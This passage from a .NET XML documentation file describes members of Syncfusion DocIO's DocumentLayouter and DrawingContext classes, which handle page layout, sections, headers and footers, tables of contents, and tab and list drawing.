        </member>
        <member name="F:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.m_isContinuousSectionLayouted">
            <summary>
            Is Continuous Section Layouted
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.m_lineHeights">
            <summary>
            Line height of the section
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.m_columnHeight">
            <summary>
            Column height of the section
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.m_columnHasBreakItem">
            <summary>
            Column has break items like (Page break or Column break)
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.m_prevColumnsWidth">
            <summary>
            Previous columns width
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.m_footnoteIDRestartEachPage">
            <summary>
            Footnote ID when the footnote restart with each page
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.m_footnoteIDRestartEachSection">
            <summary>
            Footnote ID when the footnote restart with each section
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.Layout(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Layouts the specified doc.
            </summary>
            <param name="doc">The doc.</param>
            <param name="cg">The cg.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.InitLayoutInfo">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.DrawToImage(System.Int32,System.Int32,Syncfusion.DocIO.DLS.ImageType,System.IO.MemoryStream)">
            <summary>
            Draws to image.
            </summary>
            <param name="startPageIndex">Start index of the page.</param>
            <param name="noOfPages">The no of pages.</param>
            <param name="imageType">Type of the image.</param>
            <param name="stream">The stream.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.DrawToImage(System.Int32,System.Int32,Syncfusion.DocIO.DLS.ImageType)">
            <summary>
            Draws to image.
            </summary>
            <param name="startPageIndex">Start index of the page.</param>
            <param name="noOfPages">The no of pages.</param>
            <param name="imageType">Type of the image.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.DrawToStream(System.Int32,System.Int32,Syncfusion.DocIO.DLS.ImageType,System.IO.MemoryStream)">
            <summary>
             Draw the image and return Stream
             </summary>
             <param name="startPageIndex">Start index of the page.</param>
             <param name="noOfPages">The no of pages.</param>
             <param name="imageType">Type of the image.</param>
             <param name="stream">The stream.</param>
             <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.LayoutPages">
            <summary>
            Layouts the pages.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.CreateNewPage(Syncfusion.Layouting.IWidgetContainer@)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.ResetFloatingItemsProperties">
            <summary>
            Resets the floating entity properties.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.ResetNotAddedFloatingEntityProperty">
            <summary>
            Resets the not added floating entity property.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.CreateNewSection">
            <summary>
            Creates the new section in the current page.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.CheckSectionBreak(System.Boolean,Syncfusion.Layouting.IWidgetContainer)">
            <summary>
            Checks the section break.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.HandlePageBreak">
            <summary>
            Handles the page break.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.LayoutHeaderFooter">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.GetCurrentHeader">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.GetCurrentFooter">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.GetHeaderFooter(Syncfusion.DocIO.DLS.IWSection,Syncfusion.DocIO.DLS.HeaderFooter)">
            <summary>
            Gets the header footer.
            </summary>
            <param name="section">The section.</param>
            <param name="headerFooter">The header footer.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.OnNextSection">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.GetTOCEntryPageNumbers(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Gets the TOC entry page numbers.
            </summary>
            <param name="doc">The doc.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.UpdatePageFields(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Updates page fields.
            </summary>
            <param name="doc">The doc.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.CreateImage(Syncfusion.DocIO.DLS.ImageType,System.IO.MemoryStream,System.Int32)">
            <summary>
            Creates the image.
            </summary>
            <param name="width">The width.</param>
            <param name="height">The height.</param>
            <param name="imageType">Type of the image.</param>
            <param name="stream">The stream.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.CreateImage(Syncfusion.DocIO.DLS.WPageSetup,Syncfusion.DocIO.DLS.ImageType,System.IO.MemoryStream,System.Int32)">
            <summary>
            Creates the image.
            </summary>
            <param name="width">The width.</param>
            <param name="height">The height.</param>
            <param name="imageType">Type of the image.</param>
            <param name="stream">The stream.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.IsTOCParagraph(Syncfusion.Layouting.IWidget)">
            <summary>
            Determines whether the layouted widget is TOC paragraph.
            </summary>
            <param name="widget">The widget.</param>
            <returns>
            	<c>true</c> if the specified widget is TOC paragraph; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.Layouter_LeafLayoutAfter(System.Object,Syncfusion.Layouting.LayoutedWidget,System.Boolean)">
            <summary>
            Layouter_s the leaf layout after.
            </summary>
            <param name="sender">The sender.</param>
            <param name="ltWidget">The lt widget.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.Syncfusion#Layouting#ILayoutProcessHandler#GetNextArea(System.Drawing.RectangleF@,System.Int32@,System.Boolean@,System.Boolean,System.Single@,System.Boolean,Syncfusion.Layouting.IWidgetContainer@)">
            <summary>
            Gets the next area.
            </summary>
            <param name="area">The area.</param>
            <param name="isContinuousSection">The isContinuousSection.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.GetSectionClientArea(System.Boolean,Syncfusion.Layouting.IWidgetContainer)">
            <summary>
            Get Section Client Area
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.IsFirstItemBreakItems(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Determines whether the first item is break items in the specified paragraph.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.GetColumnClientArea(System.Boolean)">
            <summary>
            Gets column client area.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.ClearFields">
            <summary>
            Clear Fields on new page.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.GetRequiredHeightForContinuousSection">
            <summary>
            Get Required Height for Continuous Section.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.GetRequiredHeightForUnEqualColumns">
            <summary>
            Get Required Height for UnEqual columns
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.GetFirstLineHeight">
            <summary>
            Get first line height of the section
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.IsEqualColumnWidth">
            <summary>
            Check whether the current section have multiple columns with equal column width
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.CheckNextSectionBreakType(System.Boolean)">
            <summary>
            Checks Next Section BreakType.
            </summary>
            <param name="isContinuousSection">The isContinuousSection.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.Syncfusion#Layouting#ILayoutProcessHandler#PushLayoutedWidget(Syncfusion.Layouting.LayoutedWidget,System.Drawing.RectangleF,System.Boolean,System.Boolean,Syncfusion.Layouting.LayoutState,System.Boolean)">
            <summary>
            
            </summary>
            <param name="ltWidget"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.FindIntersectPointAndRemovltWidget(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Finds the intersect point and removlt widget.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.Syncfusion#Layouting#ILayoutProcessHandler#HandleSplittedWidget(Syncfusion.Layouting.SplitWidgetContainer,Syncfusion.Layouting.LayoutState,Syncfusion.Layouting.LayoutedWidget,System.Boolean@)">
            <summary>
            
            </summary>
            <param name="stWidgetContainer"></param>
            <param name="state"></param>
            <param name="ltWidget"></param>
            <param name="isLayoutedWidgetNeedToPushed"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.IsContinueLayoutingNextSection(Syncfusion.DocIO.DLS.IWSection,Syncfusion.Layouting.LayoutedWidget,System.Boolean)">
            <summary>
            Checks whether to continue layouting with next section.
            </summary>
            <returns>If true; Then continue layouting with the next section. If false; Then continue with current section</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.HandleColumnAndPageBreakInLayoutedWidget(Syncfusion.Layouting.LayoutedWidget,System.Boolean,System.Boolean)">
            <summary>
            Handle Column Break and Page Break in the Continuous section.
            </summary>
            <returns>If true; Then push all the layouted widgets. If false; Then not push the layouted widgets</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.UpdateSectionHeight(System.Boolean)">
            <summary>
            Update Section Height.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.Syncfusion#Layouting#ILayoutProcessHandler#HandleLayoutedWidget(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Handle Layouted Widget.
            </summary>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.GetLinesHeight(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Get Lines Height.
            </summary>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.GetColumnIndexForMinColumnWidth">
            <summary>
            Get Column index which have minimum column width
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.GetColumnIndexForMaxColumnWidth">
            <summary>
            Get Column index which have maximum column width
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.HeaderGetNextArea(System.Drawing.RectangleF@)">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.HeaderPushLayoutedWidget(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            
            </summary>
            <param name="ltWidget"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.FootnotePushLayoutedWidget(System.Drawing.RectangleF)">
            <summary>
            Push Footnote layouted widgets into current page
            </summary>
            <param name="layoutArea"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.EndnotePushLayoutedWidget(System.Drawing.RectangleF,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Push Endnote layouted widgets.
            </summary>
            <param name="layoutArea"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.FooterGetNextArea(System.Drawing.RectangleF@)">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.FooterPushLayoutedWidget(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            
            </summary>
            <param name="ltWidget"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.DrawingContext">
            <summary>
            Gets the DrawingContext
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.IsFirstLayouting">
            <summary>
            Gets and set IsFirstLayouting
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.IsUpdatingTOC">
            <summary>
            Gets and set IsUpdatingTOC
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.IsLayoutingHeaderFooter">
            <summary>
            Gets or sets a value indicating whether this instance is layouting header footer.
            </summary>
            <value>
            <c>true</c> if this instance is layouting header footer; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.BookmarkHyperlinks">
            <summary>
            Gets the bookmark hyperlinks.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.Bookmarks">
            <summary>
            Gets the bookmarks.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.Pages">
            <summary>
            Gets pages collection
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.LastTocEntity">
            <summary>
            Gets the Last TOC Entry entity
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.CurrentPage">
            <summary>
            Gets the current page.
            </summary>
            <value>The current page.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.CurrentSection">
            <summary>
            Gets the current section.
            </summary>
            <value>The current section.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.CurrentColumn">
            <summary>
            Gets the current column.
            </summary>
            <value>The current column.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.PageResult">
            <summary>
            Gets the result.
            </summary>
            <value>The result.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.IsEvenPage">
            <summary>
            Gets a value indicating whether this instance is even page.
            </summary>
            <value>
            	<c>true</c> if this instance is even page; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.EnablePdfConformanceLevel">
            <summary>
            Gets or sets a value indicating whether create image using transparancy or not
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.tocParaItems">
            <summary>
            Gets or sets the TOC link style instance.
            </summary>
            <value>The TOC link styles instance</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.FloatingItems">
            <summary>
            Gets or sets the floating items.
            </summary>
            <value>
            The floating items.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.MaintainltWidget">
            <summary>
            Gets or sets the maintainlt widget.
            </summary>
            <value>
            The maintainlt widget.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.InterSectingPoint">
            <summary>
            Gets or sets the inter secting point.
            </summary>
            <value>
            The inter secting point.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.TOCLevels">
            <summary>
            Gets or sets the TOC levels.
            </summary>
            <value>The TOC levels.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.TOCEntryPageNumbers">
            <summary>
            Gets the TOC entry page numbers.
            </summary>
            <value>The TOC entry page numbers.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.UseTCFields">
            <summary>
            Gets or sets a value indicating whether to use TC fields.
            </summary>
            <value><c>true</c> if use TC fields; otherwise, <c>false</c>.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.HeaderFooterLPHandler">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.HeaderFooterLPHandler.#ctor(Syncfusion.DocIO.DLS.Rendering.DocumentLayouter,System.Boolean)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.HeaderFooterLPHandler"/> class.
            </summary>
            <param name="dl">The dl.</param>
            <param name="bFooter">if set to <c>true</c> [b footer].</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.HeaderFooterLPHandler.GetNextArea(System.Drawing.RectangleF@,System.Int32@,System.Boolean@,System.Boolean,System.Single@,System.Boolean,Syncfusion.Layouting.IWidgetContainer@)">
            <summary>
            Gets the next area.
            </summary>
            <param name="area">The area.</param>
            <param name="isContinuousSection">The isContinuousSection.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.HeaderFooterLPHandler.PushLayoutedWidget(Syncfusion.Layouting.LayoutedWidget,System.Drawing.RectangleF,System.Boolean,System.Boolean,Syncfusion.Layouting.LayoutState,System.Boolean)">
            <summary>
            Pushes the LayoutedWidget to external holder.
            </summary>
            <param name="ltWidget">The LayoutedWidget.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.HeaderFooterLPHandler.HandleSplittedWidget(Syncfusion.Layouting.SplitWidgetContainer,Syncfusion.Layouting.LayoutState,Syncfusion.Layouting.LayoutedWidget,System.Boolean@)">
            <summary>
            Handles the splitted widget.
            </summary>
            <param name="stWidgetContainer">The splitted widget container.</param>
            <param name="state">The current state of layout context.</param>
            <param name="ltWidget">The LayoutedWidget.</param>
            <param name="isLayoutedWidgetNeedToPushed">isLayoutedWidgetNeedToPushed</param>
            <returns>
            True for continue layout process, False - for stopping
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Rendering.DocumentLayouter.HeaderFooterLPHandler.HandleLayoutedWidget(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Handles the LayoutedWidget to external holder.
            </summary>
            <param name="ltWidget">The LayoutedWidget.</param>
        </member>
        <member name="T:Syncfusion.DocIO.Rendering.DrawingContext">
            <summary>
            Represents the class which acts as an drawing context.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.Rendering.DrawingContext.DEF_SCRIPT_FACTOR">
            <summary>
            The default script factor for sub/super script.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.Rendering.DrawingContext.m_graphics">
            <summary>
            Drawing Graphics.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.Rendering.DrawingContext.m_hyperLinks">
            <summary>
            Holds the list of hyperlinks and its corrsponding bounds.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.#ctor">
            <summary>
            Initializes a new instance of the <see cref="!:ImageRenderer"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.#ctor(System.Drawing.Graphics,System.Drawing.GraphicsUnit)">
            <summary>
            Initializes a new instance of the <see cref="!:ImageRenderer"/> class.
            </summary>
            <param name="graphics">The graphics.</param>
            <param name="pageUnit">The page unit.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawOverLappedShapeWidgets(System.Boolean)">
            <summary>
            Draws the Overlapping shape widgets.
            Currently handled only for Docx format documents
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawParagraph(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draws the paragraph.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="ltWidget">The lt widget.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawTextBox(Syncfusion.DocIO.DLS.WTextBox,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draws the text box.
            </summary>
            <param name="textBox">The text box.</param>
            <param name="ltWidget">The lt widget.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawBarTabStop(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw Bar Tab Stop of the paragraph
            </summary>
            <param name="paragraph"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetBoundsToDrawParagraphBackGroundColor(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.Layouting.LayoutedWidget,System.Boolean)">
            <summary>
            Get bounds to draw a paragraph back ground color and texture styles
            </summary>
            <param name="paragraph"></param>
            <param name="ltWidget"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsParagraphContainingListHasBreak(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Check whether Paragraph Containing list has break.
            </summary>
            <param name="ltWidget">ltWidget</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetBaseEntity(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Get the base entity
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.UpdateTabPosition(Syncfusion.Layouting.LayoutedWidget,System.Drawing.RectangleF)">
            <summary>
            Updates the tab position.
            </summary>
            <param name="widget">The widget.</param>
            <param name="clientArea">The client area.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.UpdateDecimalTabPosition(Syncfusion.Layouting.LayoutedWidget,System.Drawing.RectangleF)">
            <summary>
            Updates the decimal tab position.
            </summary>
            <param name="ltWidget">The lt widget.</param>
            <param name="clientArea">The client area.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.UpdateDecimalTabPositionInCell(Syncfusion.Layouting.LayoutedWidget,System.Drawing.RectangleF)">
            <summary>
            Updates the decimal tab position in cell.
            </summary>
            <param name="ltWidget">The lt widget.</param>
            <param name="clientArea">The client area.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsDecimalTabStart(Syncfusion.Layouting.LayoutedWidget,System.Int32,System.Boolean,System.Int32,System.Single,System.Boolean)">
            <summary>
            Determine whether is Decimal Tab Start
            </summary>
            <param name="ltWidget"></param>
            <param name="decimalTabStart"></param>
            <param name="isDecimalTab"></param>
            <param name="i"></param>
            <param name="widthToShift"></param>
            <param name="isInCell"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetWidthToShift(Syncfusion.Layouting.LayoutedWidget,System.Int32,System.Boolean,System.Drawing.RectangleF)">
            <summary>
            Get Width To Shift the xposition of childwidget
            </summary>
            <param name="ltWidget"></param>
            <param name="decimalTabStart"></param>
            <param name="isInCell"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetCurrentTabFormat(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Get the paragraph format for current tab
            </summary>
            <param name="paragraph">The Paragraph</param>
            <returns>Paragrph format</returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetColumnWidth(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Get Column Width
            </summary>
            <param name="paragraph">The Paragraph</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetLeftWidth(Syncfusion.DocIO.DLS.WParagraph,System.Int32,System.Int32)">
            <summary>
            Get Left width of the Decimal seperator
            </summary>
            <param name="paragraph"></param>
            <param name="decimalTabStart"></param>
            <param name="decimalTabEnd"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetLeftWidth(Syncfusion.Layouting.LayoutedWidget,System.Int32,System.Int32)">
            <summary>
            Get Left width of the Decimal seperator
            </summary>
            <param name="ltWidget">The lt widget.</param>
            <param name="decimalTabStart">The decimal tab start.</param>
            <param name="decimalTabEnd">The decimal tab end.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetIndexOfDecimalseparator(Syncfusion.DocIO.DLS.WParagraph,System.Int32,System.Int32,System.Single@,System.Int32@,System.Boolean@)">
            <summary>
            Get Index of Decimal Separator
            Index denotes the TextRange which have a decimal separator
            </summary>
            <param name="paragraph"></param>
            <param name="decimalTabStart"></param>
            <param name="decimalTabEnd"></param>
            <param name="leftWidth"></param>
            <param name="decimalSeparator"></param>
            <param name="isSeparator"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetIndexOfDecimalseparator(Syncfusion.Layouting.LayoutedWidget,System.Int32,System.Int32,System.Single@,System.Int32@,System.Boolean@)">
            <summary>
            Get Index of Decimal Separator
            Index denotes the TextRange which have a decimal separator
            </summary>
            <param name="ltWidget">The lt widget.</param>
            <param name="decimalTabStart">The decimal tab start.</param>
            <param name="decimalTabEnd">The decimal tab end.</param>
            <param name="leftWidth">Width of the left.</param>
            <param name="decimalSeparator">The decimal separator.</param>
            <param name="isSeparator">if set to <c>true</c> [is separator].</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsDecimalSeparator(System.Char[],System.Int32@,System.Boolean)">
            <summary>
            Determine whether is Decimal Separator
            </summary>
            <param name="ch"></param>
            <param name="decimalSeparator"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetOwnerParagraph(Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Get Owner paragraph of the LayoutedWidget
            </summary>
            <param name="ltWidget"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetTabEndIndex(Syncfusion.Layouting.LayoutedWidget,System.Int32)">
            <summary>
            Gets the tab end index.
            Index denotes the item, previous of next subsequent tab.
            </summary>
            <param name="ltWidget">The lt widget.</param>
            <param name="startIndex">The start index.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawList(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draws the list
            </summary>
            <param name="paragraph"></param>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawListTabLeader(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.Layouting.ParagraphLayoutInfo,System.Single,System.Single,System.Single)">
            <summary> 
            Draws the list tab leader.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <param name="paragraphInfo">The paragraph info.</param>
            <param name="listWidth">Width of the list.</param>
            <param name="xPosition">The x position.</param>
            <param name="yPosition">The y position.</param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetTabLeader(Syncfusion.Layouting.ParagraphLayoutInfo)">
            <summary>
            Gets the tab leader.
            </summary>
            <param name="paragraphInfo">The paragraph info.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.GetYPosition(Syncfusion.Layouting.LayoutedWidget,System.Single,Syncfusion.DocIO.DLS.ListType)">
            <summary>
            Gets the Y position.
            </summary>
            <param name="ltWidget">The ltwidget.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.IsEmptyParagraph(Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            Determines whether the paragraph is empty
            </summary>
            <param name="para">paragraph</param>
            <returns> returns true if paragraph is empty </returns>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.DrawAbsoluteTab(Syncfusion.DocIO.DLS.WAbsoluteTab,Syncfusion.Layouting.LayoutedWidget)">
            <summary>
            Draw AbsoluteTab
            </summary>
            <param name="absoluteTab"></param>
            <param name="ltWidget"></param>
        </member>
        <member name="M:Syncfusion.DocIO.Rendering.DrawingContext.UpdateAbsoluteTabLeader(Syncfusion.DocIO.DLS.WAbsoluteTab,Syncfusion.Layouting.LayoutedWidget,System.String@)">
            <summary>
            Update AbsoluteTab leader
            </summary>
            <param name="absoluteTab"></param>
            <param name="ltWidget"></param>
            <param name="text"></param>
        </member>
